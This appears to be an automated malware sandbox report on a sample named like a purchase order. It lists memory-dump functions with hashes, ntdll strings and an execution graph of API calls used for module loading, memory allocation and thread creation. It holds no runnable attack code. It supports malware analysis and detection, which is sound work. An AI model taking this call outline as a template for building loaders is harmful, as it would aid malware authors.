                                                                          Uniqueness Score: -1.00%

                                                                          Function 01923D70 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 152eac4171e01862406bdfef1c1a8f36c3ba2315ead2f211688816790eabd1fe
                                                                          • Instruction ID: 420ab20d8331380d29e8089b6212e76e24651941747f9662ae546b39b73eb6d1
                                                                          • Opcode Fuzzy Hash: 152eac4171e01862406bdfef1c1a8f36c3ba2315ead2f211688816790eabd1fe
                                                                          • Instruction Fuzzy Hash: FF90023920150402D51071585808646409A97D0301F55D511B046C558DC65489A2B221
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01922C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 67df9bfada60c959171c07c113843abc5d02a93a4bddb86746b6dff718eae0e4
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01922890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: 7cd50088c44cbfb1152c00b843597837b1e71ecec657cbb3732fe20f4c53b2ef
                                                                          • Instruction ID: b30d1275d4c3ccaac96126aeaec74ef8a3a05717d2fd353b26fca9167caabecc
                                                                          • Opcode Fuzzy Hash: 7cd50088c44cbfb1152c00b843597837b1e71ecec657cbb3732fe20f4c53b2ef
                                                                          • Instruction Fuzzy Hash: C651E7B6B04126BFCB21DF9C899097EFBB8BB482417548229F45DD7645D374DE00C7A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01992410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: cc14898f58e21c6717f3678d93ff4145f776efb31c4fb4f89104c27c1522ca23
                                                                          • Instruction ID: 6cae8cf312513f2a9a90d71f4921bde24789bf158ae713de1fd3af967b5c8681
                                                                          • Opcode Fuzzy Hash: cc14898f58e21c6717f3678d93ff4145f776efb31c4fb4f89104c27c1522ca23
                                                                          • Instruction Fuzzy Hash: FE5108B1A00645BFDF30DF9DC89097FB7FCEB88201B048869E59ED7682D674DA408761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01917630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01954725
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01954742
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01954655
                                                                          • ExecuteOptions, xrefs: 019546A0
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019546FC
                                                                          • Execute=1, xrefs: 01954713
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01954787
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: bc91968008b0de9b883d2c42e5ba8788d1b5aea7c12c300e9f5fa1dcdf889b7f
                                                                          • Instruction ID: 36f7a581eef3d555da08d3aed17fd774a9e285ad64df234cb395deed15c271be
                                                                          • Opcode Fuzzy Hash: bc91968008b0de9b883d2c42e5ba8788d1b5aea7c12c300e9f5fa1dcdf889b7f
                                                                          • Instruction Fuzzy Hash: F9516A3160021FAAEF15EBE8EC99FA977ACAF54300F040499E60DA7185EB719A81CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0192B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: a3cd43133c96a8cd72886aae84def560b50e8689a0c47630a226cc5466917d3a
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: B181E330E0526A8EEF25CE6CC850BFEBBF9AF45321F184519D86FA7699C7748840CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 019920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$[$]:%u
                                                                          • API String ID: 48624451-2819853543
                                                                          • Opcode ID: a33153f1a3d6e2c567c1bfd30fd0997170227d31dab184247c1ed504b34cb99e
                                                                          • Instruction ID: b6aa18aba9ae554e65ea15be3d2a64b0942341a4f7279f69055a42cee2d54851
                                                                          • Opcode Fuzzy Hash: a33153f1a3d6e2c567c1bfd30fd0997170227d31dab184247c1ed504b34cb99e
                                                                          • Instruction Fuzzy Hash: 2E2133BAE00119ABDB21DF6DD840AEEBBECAF54655F550126E909D3204E730DA118BA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0190F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 0195031E
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019502E7
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019502BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 9a5ce702901f683cf5261a349beee7338802165e55012841a1c9c89e2506250f
                                                                          • Instruction ID: 8185d23229165d79b275d8a8d97548262c3261aa3c2c87879b841688f733bc90
                                                                          • Opcode Fuzzy Hash: 9a5ce702901f683cf5261a349beee7338802165e55012841a1c9c89e2506250f
                                                                          • Instruction Fuzzy Hash: BCE1BF316087429FD726CF28C884B2ABBE4BF84714F180A1DF9A9DB2D1D774DA45CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0191BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 01957BAC
                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01957B7F
                                                                          • RTL: Resource at %p, xrefs: 01957B8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 0-871070163
                                                                          • Opcode ID: f69442b6d8486e8a5863abd0969f9f32e5f900631f35377aff5585e846904eed
                                                                          • Instruction ID: 6e9bd2d0770b7da90a33b8ee0ef7d38e70c089c04325fcc07e2d76cd6735597f
                                                                          • Opcode Fuzzy Hash: f69442b6d8486e8a5863abd0969f9f32e5f900631f35377aff5585e846904eed
                                                                          • Instruction Fuzzy Hash: F541B0317007069FD724DE29D840B6AB7EAEF98711F100A1DFA5EEB780DB31E9458B91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0191B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0195728C
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 019572C1
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01957294
                                                                          • RTL: Resource at %p, xrefs: 019572A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: ecbb29dc0244727e407c86b4f0bd235e627f85afd6e15280381c715616d0f699
                                                                          • Instruction ID: d3d61d63352bb6fc394e23eafae4c0702b707e1cf36f45200a1645986f9303a5
                                                                          • Opcode Fuzzy Hash: ecbb29dc0244727e407c86b4f0bd235e627f85afd6e15280381c715616d0f699
                                                                          • Instruction Fuzzy Hash: 3141F231740206ABD724CE69CC41F66B7AAFB94B51F104A19FD5EEB280DB31E942CBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01992300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: ac5edaa9807dca7a2c32663753ca29cd097279223cf0ad0dff174cb0b745ddd5
                                                                          • Instruction ID: 5d972db00a542e7a1ee567737ef7a7bfd5fe584423f2fe427a97adaa67deb340
                                                                          • Opcode Fuzzy Hash: ac5edaa9807dca7a2c32663753ca29cd097279223cf0ad0dff174cb0b745ddd5
                                                                          • Instruction Fuzzy Hash: 5B315476A00219AFDF20DF2DDC41BEEB7FCEB54611F444559E94DE3240EB309A448BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01927D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-
                                                                          • API String ID: 1302938615-2137968064
                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction ID: 1fbc6e157788701b45bc0ad1b6e47ba9689cf7dc6d4bf425f5d905207e09d4de
                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                          • Instruction Fuzzy Hash: AD91F670E042369BDB28DFADC881EFEBBA9AF54321F14451AE91DF72D8D73099408721
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 018E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 79df3ad88d68f2dc150133b2cc48647481b20078ea12f4abbdaa08b42383ed5c
                                                                          • Instruction ID: 973701bfcdd9970609d04c366c3742971b8b02ba69901b555dab2247d6f5eb76
                                                                          • Opcode Fuzzy Hash: 79df3ad88d68f2dc150133b2cc48647481b20078ea12f4abbdaa08b42383ed5c
                                                                          • Instruction Fuzzy Hash: 81810971D002699BDB35DB54DC44BEABBB8BB49754F0041EAEA1DB7280D7709E84CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0196CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0196CFBD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_18b0000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID: CallFilterFunc@8
                                                                          • String ID: @$@4rw@4rw
                                                                          • API String ID: 4062629308-2979693914
                                                                          • Opcode ID: 214c09bbae73f9e4dae5490c10bd616e6522c3fa6ac8049ca14ccad6c5f41f44
                                                                          • Instruction ID: 659e712b3d4f9500a6d72d505a7d62b74c4db37070ef9b60ad3e6e03a5187334
                                                                          • Opcode Fuzzy Hash: 214c09bbae73f9e4dae5490c10bd616e6522c3fa6ac8049ca14ccad6c5f41f44
                                                                          • Instruction Fuzzy Hash: 3A41A0B1A00219DFCB21DF99C940AADBBF8FF95B40F00842EEA59DB254D774D941CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:2.9%
                                                                          Dynamic/Decrypted Code Coverage:2.3%
                                                                          Signature Coverage:3.2%
                                                                          Total number of Nodes:939
                                                                          Total number of Limit Nodes:116
                                                                          execution_graph 97860 2ec9960 97861 2ec996f 97860->97861 97866 2ee0b80 97861->97866 97863 2ec99b0 97864 2ec998a 97864->97863 97865 2ec999d CreateThread 97864->97865 97867 2ee0b9a 97866->97867 97868 2ee0b8e 97866->97868 97867->97864 97868->97867 97871 2ee1000 LdrLoadDll 97868->97871 97870 2ee0cec 97870->97864 97871->97870 97872 2ed9ea0 97877 2ed9bd0 97872->97877 97874 2ed9ead 97897 2ed9870 97874->97897 97876 2ed9eb3 97878 2ed9bf5 97877->97878 97909 2ed4400 97878->97909 97880 2ed9c85 97881 2ed4400 LdrLoadDll 97880->97881 97882 2ed9ce4 97881->97882 97914 2ed75f0 97882->97914 97885 2ed9d32 97885->97874 97887 2ed9d49 97887->97874 97888 2ed9d40 97888->97887 97889 2ed4400 LdrLoadDll 97888->97889 97890 2ed9da9 97889->97890 97892 2ed9e31 97890->97892 97957 2ed92d0 97890->97957 97894 2ed9e89 97892->97894 97966 2ed9630 97892->97966 97970 2ee6fb0 97894->97970 97898 2ed9886 97897->97898 97905 2ed9891 97897->97905 97899 2ee7090 2 API calls 97898->97899 97899->97905 97900 2ed98a7 97900->97876 97901 2ed75f0 2 API calls 97901->97905 97902 2ed9b9e 97903 2ed9bb7 97902->97903 97904 2ee6fb0 2 API calls 97902->97904 97903->97876 97904->97903 97905->97900 97905->97901 97905->97902 97906 2ed92d0 3 API calls 97905->97906 97907 2ed4400 LdrLoadDll 97905->97907 97908 2ed9630 2 API calls 97905->97908 97906->97905 97907->97905 97908->97905 97910 2ed4425 97909->97910 97913 2ed4430 97910->97913 97973 2ed4340 97910->97973 97912 2ed4478 97912->97880 97913->97880 97915 2ee0b80 LdrLoadDll 97914->97915 97916 2ed7611 97915->97916 97917 2ed7623 97916->97917 97918 2ed7618 GetFileAttributesW 97916->97918 97917->97885 97919 2ee1d30 97917->97919 97918->97917 97920 2ee1d3e 97919->97920 97921 2ee1d45 97919->97921 97920->97888 97978 2ed4120 97921->97978 97924 2ee1d89 97945 2ee1f7f 97924->97945 97982 2ee7090 97924->97982 97927 2ee1da2 97928 2ee1f2a 97927->97928 97929 2ee1db7 97927->97929 97927->97945 97931 2ee1f34 97928->97931 97955 2ee1ebc 97928->97955 97986 2edc960 LdrLoadDll 97929->97986 97987 2edc960 LdrLoadDll 97931->97987 97933 2ee6fb0 2 API calls 97933->97945 97934 2ee1dce 97938 2ee0b80 LdrLoadDll 97934->97938 97935 2ee1f4b 97988 2ee10d0 LdrLoadDll 97935->97988 97937 2ee1f61 97940 2ee0b80 LdrLoadDll 97937->97940 97939 2ee1dea 97938->97939 97941 2ee0b80 LdrLoadDll 97939->97941 97940->97945 97942 2ee1e06 97941->97942 97943 2ee0b80 LdrLoadDll 97942->97943 97944 2ee1e25 97943->97944 97946 2ee0b80 LdrLoadDll 97944->97946 97945->97888 97947 2ee1e41 97946->97947 97948 2ee0b80 LdrLoadDll 97947->97948 97949 2ee1e5d 97948->97949 97950 2ee0b80 LdrLoadDll 97949->97950 97951 2ee1e7c 97950->97951 97952 2ee0b80 LdrLoadDll 97951->97952 97953 2ee1e98 97952->97953 97954 2ee0b80 LdrLoadDll 97953->97954 97954->97955 97955->97933 97956 2ee1f21 97955->97956 97956->97888 97958 2ed92f6 97957->97958 97997 2edc840 97958->97997 97960 2ed935d 97962 2ed94e0 97960->97962 97964 2ed937b 97960->97964 97961 2ed94c5 97961->97890 97962->97961 97963 2ed91a0 3 API calls 97962->97963 97963->97962 97964->97961 98002 2ed91a0 97964->98002 97967 2ed9656 97966->97967 97968 2edc840 2 API calls 97967->97968 97969 2ed96d2 97968->97969 97969->97892 98043 2ee5490 97970->98043 97972 2ed9e90 97972->97874 97974 2ed4364 97973->97974 97977 2ee43b0 LdrLoadDll 97974->97977 97976 2ed439e 97976->97912 97977->97976 97979 2ed4144 97978->97979 97980 2ed414b 97979->97980 97981 2ed4180 LdrLoadDll 97979->97981 97980->97924 97985 2ee1800 LdrLoadDll 97980->97985 97981->97980 97989 2ee5440 97982->97989 97984 2ee70ab 97984->97927 97985->97924 97986->97934 97987->97935 97988->97937 97990 2ee545a 97989->97990 97993 2ee6190 97990->97993 97992 2ee546b RtlAllocateHeap 97992->97984 97994 2ee619f 97993->97994 97995 2ee6205 97993->97995 97994->97995 97996 2ee0b80 LdrLoadDll 97994->97996 97995->97992 97996->97995 97999 2edc856 97997->97999 97998 2edc863 97998->97960 97999->97998 98000 2ee6fb0 2 API calls 97999->98000 98001 2edc89c 98000->98001 98001->97960 98003 2ed91b6 98002->98003 98006 2edcd40 98003->98006 98005 2ed92be 98005->97964 98007 2edcd7d 98006->98007 98008 2edcdd0 98007->98008 98009 2edce2d 98007->98009 98013 2edde40 98007->98013 98011 2edce09 98008->98011 98012 2ee6fb0 2 API calls 98008->98012 98009->98005 98011->98005 98012->98011 98016 2eddb40 98013->98016 98015 2edde54 98015->98008 98017 2eddb66 98016->98017 98020 2eddb89 98017->98020 98029 2ee6f20 98017->98029 98019 2edde31 98019->98015 98020->98019 98021 2ed4400 LdrLoadDll 98020->98021 98028 2eddc7a 98020->98028 98022 2eddcf6 98021->98022 98023 2ed4400 LdrLoadDll 98022->98023 98023->98028 98024 2edde13 98026 2ee6fb0 2 API calls 98024->98026 98027 2edde23 98026->98027 98027->98015 98028->98019 98028->98024 98032 2ecb550 98028->98032 98036 2ee52c0 98029->98036 98031 2ee6f51 98031->98020 98033 2ecb583 98032->98033 98034 2ee6f20 2 API calls 98033->98034 98035 2eccbc1 98034->98035 98035->98024 98037 2ee5323 98036->98037 98038 2ee52e1 98036->98038 98040 2ee6190 LdrLoadDll 98037->98040 98039 2ee6190 LdrLoadDll 98038->98039 98042 2ee52fb 98039->98042 98041 2ee5339 NtAllocateVirtualMemory 98040->98041 98041->98031 98042->98031 98044 2ee54ad 98043->98044 98045 2ee6190 LdrLoadDll 98044->98045 98046 2ee54be RtlFreeHeap 98045->98046 98046->97972 98047 2edfa20 98048 2edfa48 98047->98048 98049 2ed4400 LdrLoadDll 98048->98049 98050 2edfa82 98049->98050 98076 2ed5c20 98050->98076 98052 2edfaaf 98053 2edfaa8 98053->98052 98054 2ed4400 LdrLoadDll 98053->98054 98055 2edfaeb 98054->98055 98056 2ed4400 LdrLoadDll 98055->98056 98057 2edfb20 98056->98057 98087 2ed5d30 98057->98087 98059 2edfb44 98060 2edfb86 98059->98060 98074 2edfd1a 98059->98074 98091 2edf770 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 98059->98091 98062 2ed4400 LdrLoadDll 98060->98062 98063 2edfbb7 98062->98063 98064 2ed5d30 2 API calls 98063->98064 98067 2edfbdb 98064->98067 98065 2edfc21 98066 2ed5d30 2 API calls 98065->98066 98069 2edfc51 98066->98069 98067->98065 98067->98074 98092 2edf770 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 98067->98092 98070 2edfc97 98069->98070 98069->98074 98093 2edf770 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 98069->98093 98072 2ed5d30 2 API calls 98070->98072 98073 2edfcf6 98072->98073 98073->98074 98094 2edf770 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 98073->98094 98077 2ed5c53 98076->98077 98095 2ee4d30 98077->98095 98080 2ed5c77 98080->98053 98085 2ed5cb2 98109 2ee5180 98085->98109 98086 2ed5d1a 98086->98053 98088 2ed5d55 98087->98088 98114 2ee4b80 98088->98114 98091->98060 98092->98065 98093->98070 98094->98074 98096 2ee4d4a 98095->98096 98097 2ee6190 LdrLoadDll 98096->98097 98098 2ed5c70 98097->98098 98098->98080 98099 2ee4d80 98098->98099 98100 2ee4d9a 98099->98100 98101 2ee6190 LdrLoadDll 98100->98101 98102 2ee4dab 98101->98102 98113 5442ca0 LdrInitializeThunk 98102->98113 98103 2ed5c9a 98103->98080 98105 2ee5680 98103->98105 98106 2ee569d 98105->98106 98107 2ee6190 LdrLoadDll 98106->98107 98108 2ee56ae 98107->98108 98108->98085 98110 2ee519d 98109->98110 98111 2ee6190 LdrLoadDll 98110->98111 98112 2ee51ae NtClose 98111->98112 98112->98086 98113->98103 98115 2ee4b9d 98114->98115 98116 2ee6190 LdrLoadDll 98115->98116 98117 2ee4bae 98116->98117 98120 5442c60 LdrInitializeThunk 98117->98120 98118 2ed5dc9 98118->98059 98120->98118 98121 2edb420 98122 2edb448 98121->98122 98123 2ee7090 2 API calls 98122->98123 98124 2edb4a8 98123->98124 98125 2edb4b1 98124->98125 98152 2eda780 98124->98152 98127 2edb4da 98128 2edb4fa 98127->98128 98182 2edaad0 LdrLoadDll 98127->98182 98130 2edb518 98128->98130 98184 2edd2b0 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 98128->98184 98137 2edb532 98130->98137 98186 2ed4270 LdrLoadDll 98130->98186 98131 2edb4e8 98131->98128 98183 2edb150 LdrLoadDll RtlFreeHeap 98131->98183 98134 2edb50c 98185 2edd2b0 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 98134->98185 98138 2eda780 4 API calls 98137->98138 98139 2edb55f 98138->98139 98151 2edb580 98139->98151 98187 2edaad0 LdrLoadDll 98139->98187 98142 2edb56e 98142->98151 98188 2edb150 LdrLoadDll RtlFreeHeap 98142->98188 98143 2edb592 98190 2edd2b0 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 98143->98190 98145 2ee6fb0 2 API calls 98148 2edb5c2 98145->98148 98147 2edb5b8 98147->98145 98150 2edb59e 98150->98147 98191 2ed4270 LdrLoadDll 98150->98191 98151->98150 98189 2edd2b0 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 98151->98189 98153 2eda818 98152->98153 98154 2ed4400 LdrLoadDll 98153->98154 98155 2eda8de 98154->98155 98156 2ed4400 LdrLoadDll 98155->98156 98157 2eda90a 98156->98157 98158 2ed5d30 2 API calls 98157->98158 98159 2eda92f 98158->98159 98160 2edaa79 98159->98160 98200 2ee4c30 98159->98200 98162 2edaa8d 98160->98162 98192 2eda0f0 98160->98192 98162->98127 98165 2edaa6f 98166 2ee5180 2 API calls 98165->98166 98166->98160 98167 2eda968 98168 2ee5180 2 API calls 98167->98168 98169 2eda9a2 98168->98169 98206 2ee7170 LdrLoadDll 98169->98206 98171 2eda9db 98171->98162 98172 2ed5d30 2 API calls 98171->98172 98173 2edaa01 98172->98173 98173->98162 98174 2ee4c30 2 API calls 98173->98174 98175 2edaa26 98174->98175 98176 2edaa2d 98175->98176 98177 2edaa59 98175->98177 98179 2ee5180 2 API calls 98176->98179 98178 2ee5180 2 API calls 98177->98178 98180 2edaa63 98178->98180 98181 2edaa37 98179->98181 98180->98127 98181->98127 98182->98131 98183->98128 98184->98134 98185->98130 98186->98137 98187->98142 98188->98151 98189->98143 98190->98150 98191->98147 98193 2eda115 98192->98193 98194 2ed4400 LdrLoadDll 98193->98194 98195 2eda1f7 98194->98195 98196 2ed4400 LdrLoadDll 98195->98196 98198 2eda22f 98196->98198 98197 2eda2ee 98197->98162 98198->98197 98199 2ed4400 LdrLoadDll 98198->98199 98199->98197 98201 2ee4c4a 98200->98201 98202 2ee6190 LdrLoadDll 98201->98202 98203 2ee4c5b 98202->98203 98207 5442be0 LdrInitializeThunk 98203->98207 98204 2eda95d 98204->98165 98204->98167 98206->98171 98207->98204 98208 2edeba0 98211 2edd820 98208->98211 98212 2edd846 98211->98212 98213 2ed4400 LdrLoadDll 98212->98213 98214 2edd89d 98213->98214 98215 2ed4400 LdrLoadDll 98214->98215 98217 2edd8dd 98214->98217 